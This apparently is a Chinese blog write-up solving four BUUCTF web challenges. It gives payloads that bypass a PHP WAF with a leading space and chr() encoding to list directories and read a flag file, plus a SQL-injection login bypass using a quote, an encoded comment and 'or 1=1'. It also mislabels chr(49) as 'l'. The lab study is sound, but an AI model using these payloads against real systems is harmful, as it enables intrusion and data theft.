Web-2(5-8)-BUUCTF平台

19 篇文章 1 订阅

本篇内容:
[HCTF 2018]admin
[RoarCTF 2019]Easy Calc
[极客大挑战 2019]EasySQL
[极客大挑战 2019]Havefun

上一篇 | 目录 | 下一篇


[HCTF 2018]admin

本题难度对我来讲还是挺大的,虽然自己会了,但由于对flask模板注入理解不深刻,讲解不好,直接放一位大佬写的WP:HCTF2018-admin




[RoarCTF 2019]Easy Calc

访问网址:
在这里插入图片描述
查看网页源代码,发现如下内容:
在这里插入图片描述
访问calc.php
在这里插入图片描述
发现给num参数传正常算式可以,但是传字母就不行了,肯定是WAF搞的鬼。
在这里插入图片描述
在这里插入图片描述
这里利用PHP的字符串解析特性来绕过WAF。
PHP查询字符串在解析的过程中会将某些字符删除或用下划线代替。对于空白符就是删除。
这里WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF。例如:

calc.php? num=phpinfo();

在这里插入图片描述
发现phpinfo();解析成功,那么就看一下根目录下有什么东西,就要用到scandir(),构造payload:

? num=print_r(scandir('/'));
这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/
? num=print_r(scandir(chr(47)));

在这里插入图片描述
接着读取flagg文件即可,构造payload:

? num=print_r(file_get_contents('/flagg'));
这里/=chr(47),f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103)来进行绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

在这里插入图片描述
拿到最终flag。




[极客大挑战 2019]EasySQL

访问网址,尝试登录

check.php?username=admin&password=123

在这里插入图片描述
显示用户名密码错误。尝试单引号注入发现报错:

check.php?username=admin'&password=123

在这里插入图片描述
尝试后发现后加%23回显就又正常了,%23即#,这里需编码后使用。

check.php?username=admin'%23&password=123

在这里插入图片描述
尝试万能密码 or 1=1,发现就得到了flag。
在这里插入图片描述





[极客大挑战 2019]Havefun

直接查看源代码发现:
在这里插入图片描述
直接尝试一下 ?cat=dog发现出来了flag,贼懵逼的就拿到了flag。
在这里插入图片描述




========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105411604
========================================================

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值